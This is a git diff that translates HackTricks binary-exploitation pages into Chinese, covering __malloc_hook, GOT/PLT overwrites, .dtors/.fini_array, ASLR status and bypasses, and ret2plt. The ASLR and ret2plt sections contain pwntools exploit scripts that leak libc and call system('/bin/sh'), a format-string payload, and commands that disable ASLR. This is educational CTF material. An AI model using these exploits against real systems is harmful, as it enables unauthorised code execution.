-As you can [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is called, the **One Gadget will be called**.
+正如你可以在 [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html) 上看到的，变量 **`__malloc_hook`** 是一个指针，指向 **一个将在每次调用 `malloc()` 时被调用的函数的地址**，该地址 **存储在 libc 库的数据段中**。因此，如果这个地址被覆盖为一个 **One Gadget**，例如，当调用 `malloc` 时，**One Gadget 将被调用**。
 
-To call malloc it's possible to wait for the program to call it or by **calling `printf("%10000$c")`** which allocates too bytes many making `libc` calling malloc to allocate them in the heap.
+调用 malloc 的方法可以是等待程序调用它，或者通过 **调用 `printf("%10000$c")`**，这会分配过多的字节，使得 `libc` 调用 malloc 在堆中分配它们。
 
-More info about One Gadget in:
+关于 One Gadget 的更多信息：
 
 {{#ref}}
 ../one-gadget.md
 {{#endref}}
 
 > [!CAUTION]
-> Note that hooks are **disabled for GLIBC >= 2.34**. There are other techniques that can be used on modern GLIBC versions. See [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).
+> 请注意，**GLIBC >= 2.34 的钩子已被禁用**。在现代 GLIBC 版本中可以使用其他技术。请参见 [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md)。
 
 ## References
 
@@ -23,4 +23,3 @@ More info about One Gadget in:
 - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
index 4c0fdfbee..2fc8570aa 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -2,45 +2,45 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **基本信息**
 
-### **GOT: Global Offset Table**
+### **GOT: 全局偏移表**
 
-The **Global Offset Table (GOT)** is a mechanism used in dynamically linked binaries to manage the **addresses of external functions**. Since these **addresses are not known until runtime** (due to dynamic linking), the GOT provides a way to **dynamically update the addresses of these external symbols** once they are resolved.
+**全局偏移表 (GOT)** 是一种用于动态链接二进制文件的机制，用于管理**外部函数的地址**。由于这些**地址在运行时才会被知道**（由于动态链接），GOT 提供了一种方法来**动态更新这些外部符号的地址**，一旦它们被解析。
 
-Each entry in the GOT corresponds to a symbol in the external libraries that the binary may call. When a **function is first called, its actual address is resolved by the dynamic linker and stored in the GOT**. Subsequent calls to the same function use the address stored in the GOT, thus avoiding the overhead of resolving the address again.
+GOT 中的每个条目对应于二进制文件可能调用的外部库中的一个符号。当**函数第一次被调用时，其实际地址由动态链接器解析并存储在 GOT 中**。对同一函数的后续调用使用存储在 GOT 中的地址，从而避免了再次解析地址的开销。
 
-### **PLT: Procedure Linkage Table**
+### **PLT: 过程链接表**
 
-The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a trampoline to handle calls to external functions. When a binary **calls an external function for the first time, control is passed to an entry in the PLT associated with that function**. This PLT entry is responsible for invoking the dynamic linker to resolve the function's address if it has not already been resolved. After the address is resolved, it is stored in the GOT.
+**过程链接表 (PLT)** 与 GOT 密切合作，作为处理对外部函数调用的跳板。当二进制文件**第一次调用外部函数时，控制权会传递给与该函数关联的 PLT 中的一个条目**。这个 PLT 条目负责调用动态链接器来解析函数的地址，如果它尚未被解析。地址解析后，会存储在 GOT 中。
 
-**Therefore,** GOT entries are used directly once the address of an external function or variable is resolved. **PLT entries are used to facilitate the initial resolution** of these addresses via the dynamic linker.
+**因此，** 一旦外部函数或变量的地址被解析，GOT 条目就会被直接使用。**PLT 条目用于通过动态链接器促进这些地址的初始解析。**
 
-## Get Execution
+## 获取执行
 
-### Check the GOT
+### 检查 GOT
 
-Get the address to the GOT table with: **`objdump -s -j .got ./exec`**
+使用以下命令获取 GOT 表的地址：**`objdump -s -j .got ./exec`**
 
 ![](<../../../images/image (619).png>)
 
-Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xADDR_GOT`
+观察在 GEF 中**加载**可执行文件后，您可以**看到**在**GOT**中的**函数**：`gef➤ x/20x 0xADDR_GOT`
 
-![](<../../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>)
+![](<../../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>)
 
-Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
+使用 GEF，您可以**开始**一个**调试**会话并执行**`got`**以查看 GOT 表：
 
 ![](<../../../images/image (621).png>)
 
 ### GOT2Exec
 
-In a binary the GOT has the **addresses to the functions or** to the **PLT** section that will load the function address. The goal of this arbitrary write is to **override a GOT entry** of a function that is going to be executed later **with** the **address** of the PLT of the **`system`** **function** for example.
+在二进制文件中，GOT 包含**函数的地址或**指向将加载函数地址的**PLT**部分。此任意写入的目标是**覆盖一个将要执行的函数的 GOT 条目**，例如用**`system`** **函数的 PLT 地址**。
 
-Ideally, you will **override** the **GOT** of a **function** that is **going to be called with parameters controlled by you** (so you will be able to control the parameters sent to the system function).
+理想情况下，您将**覆盖**一个**将被您控制的参数调用的函数的 GOT**（这样您就可以控制发送给系统函数的参数）。
 
-If **`system`** **isn't used** by the script, the system function **won't** have an entry in the PLT. In this scenario, you will **need to leak first the address** of the `system` function and then overwrite the GOT to point to this address.
+如果脚本中**未使用**`system`，则系统函数在 PLT 中**不会**有条目。在这种情况下，您需要**首先泄漏 `system` 函数的地址**，然后覆盖 GOT 以指向该地址。
 
-You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
+您可以使用**`objdump -j .plt -d ./vuln_binary`**查看 PLT 地址。
 
 ## **One Gadget**
 
@@ -48,18 +48,17 @@ You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
 ../one-gadget.md
 {{#endref}}
 
-## **Protections**
+## **保护措施**
 
-The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it:
+**完全 RELRO** 保护旨在通过在二进制文件启动时解析所有函数的地址并在此之后使**GOT 表只读**来防止这种技术：
 
 {{#ref}}
 ../common-binary-protections-and-bypasses/relro.md
 {{#endref}}
 
-## References
+## 参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)
 - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
index 2f0be3c09..2f9f2ba41 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
@@ -5,42 +5,37 @@
 ## .dtors
 
 > [!CAUTION]
-> Nowadays is very **weird to find a binary with a .dtors section**.
+> 现在找到一个带有 .dtors 部分的二进制文件是非常 **奇怪的**。
 
-The destructors are functions that are **executed before program finishes** (after the `main` function returns).\
-The addresses to these functions are stored inside the **`.dtors`** section of the binary and therefore, if you manage to **write** the **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends.
-
-Get the address of this section with:
+析构函数是在程序结束之前（在 `main` 函数返回后）**执行的函数**。\
+这些函数的地址存储在二进制文件的 **`.dtors`** 部分，因此，如果你设法将 **地址** 写入 **`__DTOR_END__`** 中的 **shellcode**，那么它将在程序结束之前被 **执行**。
 
+获取此部分的地址：
 ```bash
 objdump -s -j .dtors /exec
 rabin -s /exec | grep “__DTOR”
 ```
-
-Usually you will find the **DTOR** markers **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.
+通常，您会发现 **DTOR** 标记 **在** 值 `ffffffff` 和 `00000000` 之间。因此，如果您只看到这些值，这意味着 **没有注册任何函数**。所以 **用** **shellcode** 的 **地址** **覆盖** **`00000000`** 以执行它。
 
 > [!WARNING]
-> Ofc, you first need to find a **place to store the shellcode** in order to later call it.
+> 当然，您首先需要找到一个 **存储 shellcode 的地方** 以便稍后调用它。
 
 ## **.fini_array**
 
-Essentially this is a structure with **functions that will be called** before the program finishes, like **`.dtors`**. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go **back to `main`** again to **exploit the vulnerability a second time**.
-
+本质上，这是一个包含 **将在程序结束前调用的函数** 的结构，类似于 **`.dtors`**。如果您可以通过 **跳转到一个地址** 来调用您的 **shellcode**，或者在需要 **再次返回 `main`** 以 **第二次利用漏洞** 的情况下，这一点很有趣。
 ```bash
 objdump -s -j .fini_array ./greeting
 
 ./greeting:     file format elf32-i386
 
 Contents of section .fini_array:
- 8049934 a0850408
+8049934 a0850408
 
 #Put your address in 0x8049934
 ```
-
-Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
+请注意，这 **不会** **创建** 一个 **永恒循环**，因为当你返回到主函数时，canary 会注意到，栈的末尾可能已被破坏，函数将不会再次被调用。因此，通过这个，你将能够 **再执行 1 次** 漏洞。
 
 > [!CAUTION]
-> Note that with [Full RELRO](../common-binary-protections-and-bypasses/relro.md), the section `.fini_array` is made **read-only**.
+> 请注意，使用 [Full RELRO](../common-binary-protections-and-bypasses/relro.md) 时，`.fini_array` 部分是 **只读** 的。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
index 28c79dd97..00103648f 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
@@ -1,36 +1,29 @@
-# Common Binary Protections
+# 常见的二进制保护
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Enable Core files
+## 启用核心文件
 
-**Core files** are a type of file generated by an operating system when a process crashes. These files capture the memory image of the crashed process at the time of its termination, including the process's memory, registers, and program counter state, among other details. This snapshot can be extremely valuable for debugging and understanding why the crash occurred.
+**核心文件** 是操作系统在进程崩溃时生成的一种文件。这些文件捕获崩溃进程在终止时的内存映像，包括进程的内存、寄存器和程序计数器状态等细节。这个快照对于调试和理解崩溃原因非常有价值。
 
-### **Enabling Core Dump Generation**
+### **启用核心转储生成**
 
-By default, many systems limit the size of core files to 0 (i.e., they do not generate core files) to save disk space. To enable the generation of core files, you can use the `ulimit` command (in bash or similar shells) or configure system-wide settings.
-
-- **Using ulimit**: The command `ulimit -c unlimited` allows the current shell session to create unlimited-sized core files. This is useful for debugging sessions but is not persistent across reboots or new sessions.
+默认情况下，许多系统将核心文件的大小限制为 0（即不生成核心文件）以节省磁盘空间。要启用核心文件的生成，可以使用 `ulimit` 命令（在 bash 或类似的 shell 中）或配置系统范围的设置。
 
+- **使用 ulimit**：命令 `ulimit -c unlimited` 允许当前 shell 会话创建无限大小的核心文件。这对于调试会话很有用，但在重启或新会话中不会持久化。
 ```bash
 ulimit -c unlimited
 ```
-
-- **Persistent Configuration**: For a more permanent solution, you can edit the `/etc/security/limits.conf` file to include a line like `* soft core unlimited`, which allows all users to generate unlimited size core files without having to set ulimit manually in their sessions.
-
+- **持久配置**：为了更永久的解决方案，您可以编辑 `/etc/security/limits.conf` 文件，添加一行如 `* soft core unlimited`，这允许所有用户生成无限大小的核心文件，而无需在他们的会话中手动设置 ulimit。
 ```markdown
 - soft core unlimited
 ```
+### **使用 GDB 分析核心文件**
 
-### **Analyzing Core Files with GDB**
-
-To analyze a core file, you can use debugging tools like GDB (the GNU Debugger). Assuming you have an executable that produced a core dump and the core file is named `core_file`, you can start the analysis with:
-
+要分析核心文件，您可以使用调试工具，如 GDB（GNU 调试器）。假设您有一个生成核心转储的可执行文件，并且核心文件名为 `core_file`，您可以通过以下命令开始分析：
 ```bash
 gdb /path/to/executable /path/to/core_file
 ```
-
-This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash.
+此命令将可执行文件和核心文件加载到 GDB 中，使您能够检查程序崩溃时的状态。您可以使用 GDB 命令来探索堆栈、检查变量并了解崩溃的原因。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
index f6dfa6c56..9f3ac51c1 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
@@ -2,114 +2,99 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**Address Space Layout Randomization (ASLR)** is a security technique used in operating systems to **randomize the memory addresses** used by system and application processes. By doing so, it makes it significantly harder for an attacker to predict the location of specific processes and data, such as the stack, heap, and libraries, thereby mitigating certain types of exploits, particularly buffer overflows.
+**地址空间布局随机化 (ASLR)** 是一种在操作系统中使用的安全技术，用于 **随机化系统和应用程序进程使用的内存地址**。通过这样做，它使攻击者预测特定进程和数据（如堆栈、堆和库）的位置变得更加困难，从而减轻某些类型的攻击，特别是缓冲区溢出。
 
-### **Checking ASLR Status**
+### **检查 ASLR 状态**
 
-To **check** the ASLR status on a Linux system, you can read the value from the `/proc/sys/kernel/randomize_va_space` file. The value stored in this file determines the type of ASLR being applied:
+要 **检查** Linux 系统上的 ASLR 状态，可以从 `/proc/sys/kernel/randomize_va_space` 文件中读取值。存储在此文件中的值决定了应用的 ASLR 类型：
 
-- **0**: No randomization. Everything is static.
-- **1**: Conservative randomization. Shared libraries, stack, mmap(), VDSO page are randomized.
-- **2**: Full randomization. In addition to elements randomized by conservative randomization, memory managed through `brk()` is randomized.
-
-You can check the ASLR status with the following command:
+- **0**：没有随机化。一切都是静态的。
+- **1**：保守随机化。共享库、堆栈、mmap()、VDSO 页面被随机化。
+- **2**：完全随机化。除了保守随机化随机化的元素外，通过 `brk()` 管理的内存也被随机化。
 
+您可以使用以下命令检查 ASLR 状态：
 ```bash
 cat /proc/sys/kernel/randomize_va_space
 ```
+### **禁用 ASLR**
 
-### **Disabling ASLR**
-
-To **disable** ASLR, you set the value of `/proc/sys/kernel/randomize_va_space` to **0**. Disabling ASLR is generally not recommended outside of testing or debugging scenarios. Here's how you can disable it:
-
+要 **禁用** ASLR，您需要将 `/proc/sys/kernel/randomize_va_space` 的值设置为 **0**。在测试或调试场景之外，通常不建议禁用 ASLR。以下是禁用它的方法：
 ```bash
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
-
-You can also disable ASLR for an execution with:
-
+您还可以通过以下方式禁用 ASLR 以进行执行：
 ```bash
 setarch `arch` -R ./bin args
 setarch `uname -m` -R ./bin args
 ```
+### **启用 ASLR**
 
-### **Enabling ASLR**
-
-To **enable** ASLR, you can write a value of **2** to the `/proc/sys/kernel/randomize_va_space` file. This typically requires root privileges. Enabling full randomization can be done with the following command:
-
+要**启用** ASLR，您可以将值 **2** 写入 `/proc/sys/kernel/randomize_va_space` 文件。这通常需要 root 权限。可以使用以下命令启用完全随机化：
 ```bash
 echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
+### **重启后的持久性**
 
-### **Persistence Across Reboots**
-
-Changes made with the `echo` commands are temporary and will be reset upon reboot. To make the change persistent, you need to edit the `/etc/sysctl.conf` file and add or modify the following line:
-
+使用 `echo` 命令所做的更改是临时的，并将在重启时重置。要使更改持久化，您需要编辑 `/etc/sysctl.conf` 文件并添加或修改以下行：
 ```tsconfig
 kernel.randomize_va_space=2 # Enable ASLR
 # or
 kernel.randomize_va_space=0 # Disable ASLR
 ```
-
-After editing `/etc/sysctl.conf`, apply the changes with:
-
+在编辑 `/etc/sysctl.conf` 后，使用以下命令应用更改：
 ```bash
 sudo sysctl -p
 ```
+这将确保您的 ASLR 设置在重启后保持不变。
 
-This will ensure that your ASLR settings remain across reboots.
+## **绕过**
 
-## **Bypasses**
+### 32位暴力破解
 
-### 32bit brute-forcing
+PaX 将进程地址空间分为 **3 组**：
 
-PaX divides the process address space into **3 groups**:
+- **代码和数据**（已初始化和未初始化）：`.text`、`.data` 和 `.bss` —> `delta_exec` 变量中的 **16 位** 熵。该变量在每个进程中随机初始化，并添加到初始地址中。
+- **通过 `mmap()` 分配的内存** 和 **共享库** —> **16 位**，称为 `delta_mmap`。
+- **栈** —> **24 位**，称为 `delta_stack`。然而，它实际上使用 **11 位**（从第 10 字节到第 20 字节，包括），对齐到 **16 字节** —> 这导致 **524,288 个可能的真实栈地址**。
 
-- **Code and data** (initialized and uninitialized): `.text`, `.data`, and `.bss` —> **16 bits** of entropy in the `delta_exec` variable. This variable is randomly initialized with each process and added to the initial addresses.
-- **Memory** allocated by `mmap()` and **shared libraries** —> **16 bits**, named `delta_mmap`.
-- **The stack** —> **24 bits**, referred to as `delta_stack`. However, it effectively uses **11 bits** (from the 10th to the 20th byte inclusive), aligned to **16 bytes** —> This results in **524,288 possible real stack addresses**.
+上述数据适用于 32 位系统，减少的最终熵使得通过一次又一次重试执行来绕过 ASLR 成为可能，直到漏洞成功完成。
 
-The previous data is for 32-bit systems and the reduced final entropy makes possible to bypass ASLR by retrying the execution once and again until the exploit completes successfully.
-
-#### Brute-force ideas:
-
-- If you have a big enough overflow to host a **big NOP sled before the shellcode**, you could just brute-force addresses in the stack until the flow **jumps over some part of the NOP sled**.
-  - Another option for this in case the overflow is not that big and the exploit can be run locally is possible to **add the NOP sled and shellcode in an environment variable**.
-- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems):
+#### 暴力破解思路：
 
+- 如果您有足够大的溢出以容纳 **大 NOP 滑梯在 shellcode 之前**，您可以在栈中暴力破解地址，直到流程 **跳过 NOP 滑梯的某部分**。
+- 如果溢出不那么大，并且漏洞可以在本地运行，另一种选择是 **在环境变量中添加 NOP 滑梯和 shellcode**。
+- 如果漏洞是本地的，您可以尝试暴力破解 libc 的基地址（对 32 位系统有用）：
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-
-- If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
+- 如果攻击一个远程服务器，你可以尝试**暴力破解 `libc` 函数 `usleep` 的地址**，传递参数 10（例如）。如果在某个时刻**服务器响应多了 10 秒**，你就找到了这个函数的地址。
 
 > [!TIP]
-> In 64bit systems the entropy is much higher and this isn't possible.
+> 在 64 位系统中，熵要高得多，这样是不可能的。
 
-### Local Information (`/proc/[pid]/stat`)
+### 本地信息 (`/proc/[pid]/stat`)
 
-The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
+进程的**`/proc/[pid]/stat`**文件始终对所有人可读，并且**包含有趣的**信息，例如：
 
-- **startcode** & **endcode**: Addresses above and below with the **TEXT** of the binary
-- **startstack**: The address of the start of the **stack**
-- **start_data** & **end_data**: Addresses above and below where the **BSS** is
-- **kstkesp** & **kstkeip**: Current **ESP** and **EIP** addresses
-- **arg_start** & **arg_end**: Addresses above and below where **cli arguments** are.
-- **env_start** &**env_end**: Addresses above and below where **env variables** are.
+- **startcode** & **endcode**：二进制文件的**TEXT**上下的地址
+- **startstack**：**栈**的起始地址
+- **start_data** & **end_data**：**BSS**上下的地址
+- **kstkesp** & **kstkeip**：当前的**ESP**和**EIP**地址
+- **arg_start** & **arg_end**：**cli 参数**上下的地址
+- **env_start** & **env_end**：**env 变量**上下的地址
 
-Therefore, if the attacker is in the same computer as the binary being exploited and this binary doesn't expect the overflow from raw arguments, but from a different **input that can be crafted after reading this file**. It's possible for an attacker to **get some addresses from this file and construct offsets from them for the exploit**.
+因此，如果攻击者与被利用的二进制文件在同一台计算机上，并且该二进制文件不期望来自原始参数的溢出，而是来自读取此文件后可以构造的不同**输入**。攻击者可以**从此文件中获取一些地址并从中构造偏移量以进行利用**。
 
 > [!TIP]
-> For more info about this file check [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) searching for `/proc/pid/stat`
+> 有关此文件的更多信息，请查看 [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html)，搜索 `/proc/pid/stat`
 
-### Having a leak
+### 拥有一个泄漏
 
-- **The challenge is giving a leak**
-
-If you are given a leak (easy CTF challenges), you can calculate offsets from it (supposing for example that you know the exact libc version that is used in the system you are exploiting). This example exploit is extract from the [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (check that page for more details):
+- **挑战是给出一个泄漏**
 
+如果你得到了一个泄漏（简单的 CTF 挑战），你可以从中计算偏移量（假设例如你知道你正在利用的系统中使用的确切 libc 版本）。这个示例利用提取自 [**这里的示例**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak)（查看该页面以获取更多详细信息）：
 ```python
 from pwn import *
 
@@ -124,29 +109,27 @@ libc.address = system_leak - libc.sym['system']
 log.success(f'LIBC base: {hex(libc.address)}')
 
 payload = flat(
-    'A' * 32,
-    libc.sym['system'],
-    0x0,        # return address
-    next(libc.search(b'/bin/sh'))
+'A' * 32,
+libc.sym['system'],
+0x0,        # return address
+next(libc.search(b'/bin/sh'))
 )
 
 p.sendline(payload)
 
 p.interactive()
 ```
-
 - **ret2plt**
 
-Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check:
+通过利用缓冲区溢出，可以利用 **ret2plt** 来提取 libc 中一个函数的地址。检查：
 
 {{#ref}}
 ret2plt.md
 {{#endref}}
 
-- **Format Strings Arbitrary Read**
-
-Just like in ret2plt, if you have an arbitrary read via a format strings vulnerability it's possible to exfiltrate te address of a **libc function** from the GOT. The following [**example is from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got):
+- **格式字符串任意读取**
 
+就像在 ret2plt 中一样，如果通过格式字符串漏洞有任意读取的能力，可以从 GOT 中提取 **libc 函数** 的地址。以下 [**示例来自这里**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)：
 ```python
 payload = p32(elf.got['puts'])  # p64() if 64-bit
 payload += b'|'
@@ -157,8 +140,7 @@ payload += b'%3$s'              # The third parameter points at the start of the
 payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
 payload += p32(elf.symbols['main'])
 ```
-
-You can find more info about Format Strings arbitrary read in:
+您可以在以下位置找到有关格式字符串任意读取的更多信息：
 
 {{#ref}}
 ../../format-strings/
@@ -166,11 +148,10 @@ You can find more info about Format Strings arbitrary read in:
 
 ### Ret2ret & Ret2pop
 
-Try to bypass ASLR abusing addresses inside the stack:
+尝试通过滥用栈内的地址来绕过 ASLR：
 
 {{#ref}}
 ../../stack-overflow/ret2ret.md
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
index 353d08f68..4c2f08169 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
@@ -2,40 +2,37 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-The goal of this technique would be to **leak an address from a function from the PLT** to be able to bypass ASLR. This is because if, for example, you leak the address of the function `puts` from the libc, you can then **calculate where is the base of `libc`** and calculate offsets to access other functions such as **`system`**.
-
-This can be done with a `pwntools` payload such as ([**from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)):
+该技术的目标是**从PLT中泄露一个函数的地址**以绕过ASLR。这是因为，如果例如，你泄露了libc中`puts`函数的地址，你就可以**计算出`libc`的基址**并计算偏移量以访问其他函数，如**`system`**。
 
+这可以通过`pwntools`有效载荷完成，例如（[**来自这里**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)）：
 ```python
 # 32-bit ret2plt
 payload = flat(
-    b'A' * padding,
-    elf.plt['puts'],
-    elf.symbols['main'],
-    elf.got['puts']
+b'A' * padding,
+elf.plt['puts'],
+elf.symbols['main'],
+elf.got['puts']
 )
 
 # 64-bit
 payload = flat(
-    b'A' * padding,
-    POP_RDI,
-    elf.got['puts']
-    elf.plt['puts'],
-    elf.symbols['main']
+b'A' * padding,
+POP_RDI,
+elf.got['puts']
+elf.plt['puts'],
+elf.symbols['main']
 )
 ```
+注意如何 **`puts`**（使用来自 PLT 的地址）被调用时，使用的是位于 GOT（全局偏移表）中的 `puts` 地址。这是因为在 `puts` 打印 `puts` 的 GOT 条目时，这个 **条目将包含 `puts` 在内存中的确切地址**。
 
-Note how **`puts`** (using the address from the PLT) is called with the address of `puts` located in the GOT (Global Offset Table). This is because by the time `puts` prints the GOT entry of `puts`, this **entry will contain the exact address of `puts` in memory**.
-
-Also note how the address of `main` is used in the exploit so when `puts` ends its execution, the **binary calls `main` again instead of exiting** (so the leaked address will continue to be valid).
+还要注意如何在利用中使用了 `main` 的地址，以便当 `puts` 结束其执行时，**二进制文件会再次调用 `main` 而不是退出**（因此泄露的地址将继续有效）。
 
 > [!CAUTION]
-> Note how in order for this to work the **binary cannot be compiled with PIE** or you must have **found a leak to bypass PIE** in order to know the address of the PLT, GOT and `main`. Otherwise, you need to bypass PIE first.
-
-You can find a [**full example of this bypass here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). This was the final exploit from that example:
+> 注意，为了使这项工作正常，**二进制文件不能使用 PIE 编译**，或者你必须 **找到一个泄露以绕过 PIE**，以便知道 PLT、GOT 和 `main` 的地址。否则，你需要先绕过 PIE。
 
+你可以在 [**这里找到这个绕过的完整示例**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass)。这是该示例的最终利用：
 ```python
 from pwn import *
 
@@ -46,10 +43,10 @@ p = process()
 p.recvline()
 
 payload = flat(
-    'A' * 32,
-    elf.plt['puts'],
-    elf.sym['main'],
-    elf.got['puts']
+'A' * 32,
+elf.plt['puts'],
+elf.sym['main'],
+elf.got['puts']
 )
 
 p.sendline(payload)
@@ -61,23 +58,21 @@ libc.address = puts_leak - libc.sym['puts']
 log.success(f'LIBC base: {hex(libc.address)}')
 
 payload = flat(
-    'A' * 32,
-    libc.sym['system'],
-    libc.sym['exit'],
-    next(libc.search(b'/bin/sh\x00'))
+'A' * 32,
+libc.sym['system'],
+libc.sym['exit'],
+next(libc.search(b'/bin/sh\x00'))
 )
 
 p.sendline(payload)
 
 p.interactive()
 ```
-
-## Other examples & References
+## 其他示例与参考
 
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-  - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`
+- 64 位，启用 ASLR，但没有 PIE，第一步是填充溢出直到 canary 的字节 0x00，然后调用 puts 并泄露它。使用 canary 创建一个 ROP gadget 来调用 puts 以泄露 GOT 中 puts 的地址，然后再调用 `system('/bin/sh')` 的 ROP gadget。
 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
-  - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
